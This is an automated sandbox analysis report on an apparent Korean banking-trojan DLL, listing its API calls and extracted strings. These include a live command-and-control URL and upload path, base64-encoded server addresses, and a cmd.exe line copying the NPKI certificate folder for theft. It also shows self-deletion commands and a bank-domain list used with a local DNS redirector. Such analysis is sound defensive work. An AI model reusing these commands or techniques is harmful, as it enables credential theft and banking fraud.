Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: D809InitializeUninitialize
String ID:
API String ID: 4184929662-0
Opcode ID: dea62da469005834a17dcaf4a989a915fdff2ae1d3d4b724e7fed293f5c704ef
Instruction ID: a6f7315796581bb2d5abe88462ee4dad0f4ce63d180d3def42c8f6836305b1d2
Opcode Fuzzy Hash: dea62da469005834a17dcaf4a989a915fdff2ae1d3d4b724e7fed293f5c704ef
Instruction Fuzzy Hash: 5F1190B0504341AFC300EF64C909B4B7BE8BB88714F044A2EF899A33C1D7789904CBA6

Function 00403FA0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

6D7D56F0.MFC42(?,?,?,?,?,?,?,?,00404838,000000FF), ref: 00403FC7
6D809A60.MFC42(?,?,?,?,000000D3,00000002,00000008,?,00000000), ref: 00403FE5
6D7CEC00.MFC42(?), ref: 00403FF8
6D7CA420.MFC42(?,?,?,?,?,?,00000008,?,00000000), ref: 0040400E

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420D809
String ID:
API String ID: 2330412994-0
Opcode ID: bab0631a7cd3f2ee1a1cae18d2b9e26db3f3eb49dea1ffd19132274849109f0e
Instruction ID: b8dc7083480bc4708094733b35e4e89a4a97086a0659bf2509b7bb66655cd5a6
Opcode Fuzzy Hash: bab0631a7cd3f2ee1a1cae18d2b9e26db3f3eb49dea1ffd19132274849109f0e
Instruction Fuzzy Hash: 7B01A9B1248750ABD314EB44C942F4AB7D4AB94F14F40852EF659672C1C7B85904C7A7

Function 00403ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

6D7C2DD0.MFC42(00000040,?,?,?,00404C4A,000000FF), ref: 00403EE9
6D7C7F20.MFC42 ref: 00403F03

Strings

0?@, xrefs: 00403F08

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID:
String ID: 0?@
API String ID: 0-4113061678
Opcode ID: 8a7acfc78b9fe263d97fcbbf9cc9dcb08269914006500b81099803699076fa74
Instruction ID: dd62c5200595188f2f15a0fc69b55e0932859a66ba4cda06ce91d8cb1555c2c7
Opcode Fuzzy Hash: 8a7acfc78b9fe263d97fcbbf9cc9dcb08269914006500b81099803699076fa74
Instruction Fuzzy Hash: 2FE092F1A84A61DBD310EF188902B9A7AE4F784B60F404A3EF169E77C0E77C484187C6

Analysis Process: rundll32.exePID: 7292, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	18.9%
Total number of Nodes:	974
Total number of Limit Nodes:	27

Executed Functions

Function 1000B0A0 Relevance: 75.6, APIs: 31, Strings: 12, Instructions: 387
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(?,?), ref: 1000B0D9
lstrcat.KERNEL32(?,10019BD4), ref: 1000B0F2
lstrcat.KERNEL32(?,*.*), ref: 1000B101
FindFirstFileA.KERNEL32(?,?,?,1000B62C,?), ref: 1000B113
FindNextFileA.KERNEL32(00000000,?,?,1000B62C,?), ref: 1000B139
lstrcpy.KERNEL32(?,?), ref: 1000B194
lstrcat.KERNEL32(?,10019BD4), ref: 1000B1A7
lstrcat.KERNEL32(?,0000002E), ref: 1000B1B9
_strcmpi.MSVCRT ref: 1000B1C8
GetTickCount.KERNEL32 ref: 1000B252
srand.MSVCRT ref: 1000B259
rand.MSVCRT ref: 1000B264
rand.MSVCRT ref: 1000B280
rand.MSVCRT ref: 1000B28E
rand.MSVCRT ref: 1000B29C

Strings

cmd.exe /c rd /q /s "c:\%s", xrefs: 1000B54F
107.163.241.232:12354/show.php, xrefs: 1000B437
., xrefs: 1000B14E
c:\%s, xrefs: 1000B392
c:\%c%c%c%c.%c%c%c, xrefs: 1000B2EF
*.*, xrefs: 1000B0FB
P, xrefs: 1000B412
09121307.txt, xrefs: 1000B1EC, 1000B513
NPKI, xrefs: 1000B1C3
cmd.exe /c md c:\%s && xcopy /Y "%s" "c:\%s" /S /E /C /H && exit, xrefs: 1000B32A
%s\%s, xrefs: 1000B204, 1000B520
/u.php, xrefs: 1000B4E0

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: lstrcatrand$FileFindlstrcpy$CountFirstNextTick_strcmpisrand
String ID: %s\%s$*.*$.$/u.php$09121307.txt$107.163.241.232:12354/show.php$NPKI$P$c:\%c%c%c%c.%c%c%c$c:\%s$cmd.exe /c md c:\%s && xcopy /Y "%s" "c:\%s" /S /E /C /H && exit$cmd.exe /c rd /q /s "c:\%s"
API String ID: 3781771675-2805527149
Opcode ID: bbee613478e399059a034d314f1c1b5c2bab36900512fa1b90fe0e01db607cb7
Instruction ID: eb23a03111fe4c4eb7601a1bdb2af3d3cdc9092a3aaab1ed9f55861fbd2d4e08
Opcode Fuzzy Hash: bbee613478e399059a034d314f1c1b5c2bab36900512fa1b90fe0e01db607cb7
Instruction Fuzzy Hash: 5FD1A6B1508386AFE725CB64CD91BEB77DAEBC8344F004D2DE68A97241DB74D6088B53

Function 100055E0 Relevance: 56.3, APIs: 23, Strings: 9, Instructions: 263
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 10005652
socket.WS2_32(00000002,00000002,00000000), ref: 10005664
socket.WS2_32(00000002,00000002,00000000), ref: 10005670
htons.WS2_32(00000035), ref: 10005687
inet_addr.WS2_32(127.0.0.1), ref: 10005699
htons.WS2_32(00000035), ref: 100056A1
inet_addr.WS2_32(?), ref: 100056A8
bind.WS2_32(00000000,?,00000010), ref: 100056B2
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 100056CB
select.WS2_32 ref: 1000570C
Sleep.KERNEL32(000003E8), ref: 10005721
wsprintfA.USER32 ref: 100057C2
malloc.MSVCRT ref: 1000582A
htons.WS2_32(00008180), ref: 10005861
htons.WS2_32(00008182), ref: 10005878
htons.WS2_32(00000001), ref: 10005884
htons.WS2_32(0000C00C), ref: 100058AA
htons.WS2_32(00000001), ref: 100058B3
htons.WS2_32(00000001), ref: 100058BC
htons.WS2_32(00000004), ref: 100058D1
inet_addr.WS2_32(127.0.0.1), ref: 100058EC
closesocket.WS2_32(?), ref: 10005964
closesocket.WS2_32(00000000), ref: 10005967

Strings

ahnlab, xrefs: 10005804
alyac, xrefs: 100057F4
c:\3.txt, xrefs: 1000594C
iRecv=0, xrefs: 10005947
v3lite, xrefs: 10005814
8.8.8.8, xrefs: 1000562D
www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 100057D9
%s|, xrefs: 100057BB
127.0.0.1, xrefs: 1000568F, 100058E7

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: htons$inet_addr$closesocketsocket$SleepStartupbindioctlsocketmallocselectwsprintf
String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$c:\3.txt$iRecv=0$v3lite$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
API String ID: 1328051524-4015207955
Opcode ID: 4828b0be3a3e2642fd62dd5c7122c309b17e755da9cbc61a39448c2e2ba24f89
Instruction ID: 8807dec323691aef2f5420f23a93805b2fe18ff7326935eede266de03f692902
Opcode Fuzzy Hash: 4828b0be3a3e2642fd62dd5c7122c309b17e755da9cbc61a39448c2e2ba24f89
Instruction Fuzzy Hash: 52A1AF31608344ABE710DB64CC45BAFBBE5EF88744F00491DF68597290DBB5E988CB57

Function 100051B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 100051CA
GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 100051DA
GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100051F1
malloc.MSVCRT ref: 1000520A
GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,1000BBB2,00000035), ref: 10005230

Strings

GetExtendedUdpTable, xrefs: 100051D0
iphlpapi.dll, xrefs: 100051B5

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ExtendedTable$AddressLibraryLoadProcmalloc
String ID: GetExtendedUdpTable$iphlpapi.dll
API String ID: 2385667234-1809394930
Opcode ID: 02ae61e850a1fbcb1a22724745b000119a1a924dfa203604408c47b977caae4e
Instruction ID: 95fc7806c394d6749ad61a5c4c73f14e2c7cad3558be80feca9663e5c097cf93
Opcode Fuzzy Hash: 02ae61e850a1fbcb1a22724745b000119a1a924dfa203604408c47b977caae4e
Instruction Fuzzy Hash: 3A21B171204302ABE710DB68EC85BAB37E4EF857A1F014625F995C62C4D736D989CBA2

Function 1000C230 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.MSVCRT ref: 1000C249
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000C266
DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 1000C298
GetLastError.KERNEL32(00000400,?,00000000,00000000), ref: 1000C2AC
FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 1000C2BA

Strings

\\.\PHYSICALDRIVE%d, xrefs: 1000C243

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ControlCreateDeviceErrorFileFormatLastMessagesprintf
String ID: \\.\PHYSICALDRIVE%d
API String ID: 1111953355-613073274
Opcode ID: 5b8cab77ea9baa15ef1ace31b166184b4a38632cffe6251980286e991f52f3d4
Instruction ID: 2bed02b5d34ca8770e45348e80b358c4abd8b06a0c17b21f9c9ba0ca96d4da27
Opcode Fuzzy Hash: 5b8cab77ea9baa15ef1ace31b166184b4a38632cffe6251980286e991f52f3d4
Instruction Fuzzy Hash: 9A4128762503046BF324DA38DC46FEB7395EBD8760F508729FA15CB1C0EEB59A088395

Function 10004F60 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
CloseHandle.KERNEL32 ref: 10004FD5

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 0a72c3fa9fd0ee3bb1be3fa8c5ebfe263c00cb6316c39cb91c3d4bdc8cf6a7c0
Instruction ID: 7f0ff367e45407a8e9ac9eb591174fee72e0e2360a841818fda95b81e512ac6d
Opcode Fuzzy Hash: 0a72c3fa9fd0ee3bb1be3fa8c5ebfe263c00cb6316c39cb91c3d4bdc8cf6a7c0
Instruction Fuzzy Hash: 6401D7B8608301ABE704DF64C885B6A77E8FBC8B45F40891DF54986290DB74D945CB62

Function 10021806 Relevance: 3.2, APIs: 2, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00100000,00000000,00008000,10021806,00000000), ref: 1002187F
VirtualProtect.KERNEL32(003CB200,00000200,10021770,10021517,?,10021770,00000000,10021517), ref: 100219F2

Memory Dump Source

Source File: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: 1af49aae6d613e156a6d82bb86e3b7e212962c21a75418f354bfad0ed6b494bc
Instruction ID: 3cf54787ec1993463bbc57c4f2f394104f3851b60521f152caf73e44949bcc96
Opcode Fuzzy Hash: 1af49aae6d613e156a6d82bb86e3b7e212962c21a75418f354bfad0ed6b494bc
Instruction Fuzzy Hash: 0B614A7AA001219FDB21CF24DC907E9B7B1EFA5350FA505A4D889AB381D770ADC2CB90

Function 1000C160 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,1000C305,00000000), ref: 1000C1B0

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
Instruction ID: 86cc3cd5e500d09f34f504799c04322c58a7eb8eb055a7fb12ab9f39681c7df9
Opcode Fuzzy Hash: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
Instruction Fuzzy Hash: 98F0A96228A3C29EE302CB688855BD2FFA47B76710F0CD7C9E1D85B283C2548598D766

Function 10004990 Relevance: 1.5, APIs: 1, Instructions: 10filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000000FF,?), ref: 100049A4

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 299059951f87d2bd72ad2bc17c95e565a8fb2202d3526d3a88a2d9952b43b325
Instruction ID: 239b56050324291377b7f4a21ae448826d8efed17bf8fca953d792130a950d08
Opcode Fuzzy Hash: 299059951f87d2bd72ad2bc17c95e565a8fb2202d3526d3a88a2d9952b43b325
Instruction Fuzzy Hash: B7C002B9608301BFDA04CB94C888D6BB7E9EBC8340F00C90CF59983210C734E841CB22

Function 10004AA0 Relevance: 1.5, APIs: 1, Instructions: 6processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,100069B2,00000002,00000000,00000000,00000000), ref: 10004AAA

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 1682b21d8ce4723ada24454b6901746b0d484530990e3df5589c65f42c8cbb76
Instruction ID: 1bfc50ff904c48d483376f5291371ce4043d81f8e4f06f90ef1f9d0dc718a3ab
Opcode Fuzzy Hash: 1682b21d8ce4723ada24454b6901746b0d484530990e3df5589c65f42c8cbb76
Instruction Fuzzy Hash: 9CB09279104200ABD204DB60C984C2BBBE9BB94310B008808F48582110C631D840CB21

Function 1000BB20 Relevance: 75.5, APIs: 28, Strings: 15, Instructions: 267
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006A7E
Part of subcall function 10006A50: GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006A95
Part of subcall function 10006A50: GetModuleFileNameA.KERNEL32(10000000,c:\ijbbn\gduol.dll,00000104), ref: 10006AA7
Part of subcall function 10006A50: strrchr.MSVCRT ref: 10006AD5
Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006AED
Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006AFE
Part of subcall function 10006A50: wsprintfA.USER32 ref: 10006B0F

PathFileExistsA.SHLWAPI(c:\test.1), ref: 1000BB32
GetCurrentProcessId.KERNEL32 ref: 1000BB3C

Part of subcall function 10004FF0: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,771B0F00), ref: 10004FFD
Part of subcall function 10004FF0: TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
Part of subcall function 10004FF0: CloseHandle.KERNEL32(00000000), ref: 10005017

ExitProcess.KERNEL32 ref: 1000BB4D
CreateMutexA.KERNEL32(00000000,00000001,Mkrnaver.com:6520), ref: 1000BB5D
GetLastError.KERNEL32 ref: 1000BB63
Sleep.KERNEL32(000007D0), ref: 1000BC33
DeleteFileA.KERNEL32(?), ref: 1000BC36
CreateThread.KERNEL32(00000000,00000000,10009230,00000000,00000000,00000000), ref: 1000BC5B
Sleep.KERNEL32(000003E8), ref: 1000BC62

Strings

c:\wiseman.exe, xrefs: 1000BBF8, 1000BC12
SeDebugPrivilege, xrefs: 1000BB7F
aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw, xrefs: 1000BC7E
http://107.163.241.232:12354/show.php, xrefs: 1000BCB9
krnaver.com:6520, xrefs: 1000BC8D, 1000BD0B
c:\windows\system32, xrefs: 1000BC0B
123, xrefs: 1000BBBA
c:\ijbbn\ReadMe.txt, xrefs: 1000BB8E, 1000BBDA
Mkrnaver.com:6520, xrefs: 1000BB54
c:\test.1, xrefs: 1000BB2D
c:\ijbbn, xrefs: 1000BE13
cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s", xrefs: 1000BE1C
www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 1000BCE3
d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p, xrefs: 1000BCAA
MTc0LjEzOS42NS44Njo1NjU4MA==, xrefs: 1000BC6D

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: FileProcesswsprintf$CreateModuleNameSleep$CloseCurrentDeleteErrorExistsExitHandleLastMutexOpenPathTerminateThreadstrrchr
String ID: 123$MTc0LjEzOS42NS44Njo1NjU4MA==$Mkrnaver.com:6520$SeDebugPrivilege$aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw$c:\ijbbn$c:\ijbbn\ReadMe.txt$c:\test.1$c:\windows\system32$c:\wiseman.exe$cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"$d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p$http://107.163.241.232:12354/show.php$krnaver.com:6520$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
API String ID: 666504283-2053972284
Opcode ID: 1a1ffc0209291ceea76840690b20f3bbf0ea9f5aa895b07c39f2ebcda632cb22
Instruction ID: c2b964bca94a91e70f938dacfcc7d80519b83498a4bbcf2bec864d40d2c1bd09
Opcode Fuzzy Hash: 1a1ffc0209291ceea76840690b20f3bbf0ea9f5aa895b07c39f2ebcda632cb22
Instruction Fuzzy Hash: 0171EE75784B007BF220E6B49C47FAA3581DB85B95F210224F706BE1C6EEE4FA44816E

Function 10007800 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 427
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

